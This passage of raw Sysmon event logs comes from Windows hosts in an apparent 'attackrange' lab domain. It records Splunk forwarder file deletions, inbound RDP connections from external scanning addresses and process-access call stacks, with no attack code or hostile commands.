AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=3AB48CC2F7C2A948648DA01886F2151A,SHA256=62F50103D2056B7CC95773B1240C5CA2B29338241A31B3959451BF33D008E6DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:50.296{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:50.109{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AB6ED18694BC4404BE177226774BDA4,SHA256=6A709DDFD6BA81CFE626FD3C19D31B244D8F79CF0FCD162FD1993621DC5F27D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050078Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:50.801{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653DC738461DC305AE8A759949B478B7,SHA256=D309C8C6D83E7438226EEE3AD6F247484409B43B9B2E7E0DEB40BC20DA040C92,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050077Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:48.131{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56728-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050076Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:47.991{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53774-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000073287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:51.656{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E761AC50906368DDDC1DE9594B9C299A,SHA256=E153AD436E1F89D2938B6A2893B9B72C617BCC4C10D8FB1CD696A600DBC61341,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:51.156{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:51.125{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E0C573C8F598E93A1216F2C80CB6A1A,SHA256=ABC6445D646FF6372A2A2FE315E93531DD2F52B826CC5FD85F648EEF04CE0B4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050081Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:51.863{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=220BBEA8635C6D4D5A0A4743C8A84DB4,SHA256=ED2B99EF82FDDD1908D9040BC5695BA62EF45D276B006A0F6F0CD50BC62E57CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050080Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:48.861{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52516-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050079Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:51.019{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=874A440861E74D83739D16427FB88E5D,SHA256=6496E7EF9283C914D53688BDE222D07FEA8E045F5DF8045A6AAB09C204415B44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:52.953{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FCDB62925C45DDC63F904D12AFC11ECA,SHA256=18A2FB4BB79F969C82BA818E5105A737648D3C5AABB41976BF1062D8BBA1B611,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:52.687{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=38A068815CBAB0B018B8761B3FABB8E2,SHA256=ADD6445C72CCE5B8389E9C45BBC7C1B039044C1762B0F2E28E05BE5A23EA2823,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:50.820{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54698-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:52.343{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:52.140{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB42741FD0BA5A2DE2E59ADBDFC5D937,SHA256=A340AC09A45A5F571D0DA5ED14B2FAD03DF04EF89228912BE097CC2C7E69D98B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050082Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:52.894{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=389D312D07A2B346DBD19DC1100D72BB,SHA256=A7637D9C7C1765E7E1C2F6D601DD42F5F812E7235E79DD144466ADBC5A5B493B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:53.968{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:53.734{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=B224BE8633640310FB822DB17BD0DF55,SHA256=B5234027CAF28EB4C8CA3F3815868FB8C3A8CA556746C992033DC8E9A5E7483B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:52.510{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64873-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:52.442{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53334-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:52.372{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56062-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:53.593{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:53.156{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:53.156{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E24F684E0AD64AA803CC176200834096,SHA256=D787847589082D4736CF36228A387ED59E942CC1F99494A1B6A890FDB513FFE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050085Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:53.910{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=748159960BEC2C493EF825882252C92C,SHA256=C47AD274A6A5E9CDFDA38A3544166B94951675110D315BD8E4E8FA370819CFAB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050084Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:51.387{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59679-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050083Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:49.803{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58207-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000073304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:54.984{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FDBD29CF71C59E064236A32A38B8B8C,SHA256=03D6F943E6DFC3BEFE46D766E700CE23D79A915ECFDF3FA6B12C60DC4FDD5B30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:54.859{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=7DE1226E34BCB333E663979CA3B24BCF,SHA256=D287525128CE00CB1BF24822AFF5DA349F2B3D63FEE91DBC13569CDA7B6E3772,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:54.812{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:54.171{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F67135B3357E5772BAC42A33CA4E0A55,SHA256=4B0028F460818F8304A5A538558F51A0F85D2AB6D57EA76906A5E0440C785DE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050099Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.910{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AADC4AA07C4F5EEC9781CB299A76E155,SHA256=AE819BE403BA96465015F190336FFF1D7AE0C2E6E5AB7FE66662525007539A2F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050098Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBB6-607E-E206-00000000BB01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050097Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050096Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050095Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050094Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050093Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050092Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050091Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050090Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050089Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050088Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EBB6-607E-E206-00000000BB01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050087Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBB6-607E-E206-00000000BB01}4012C:\Program 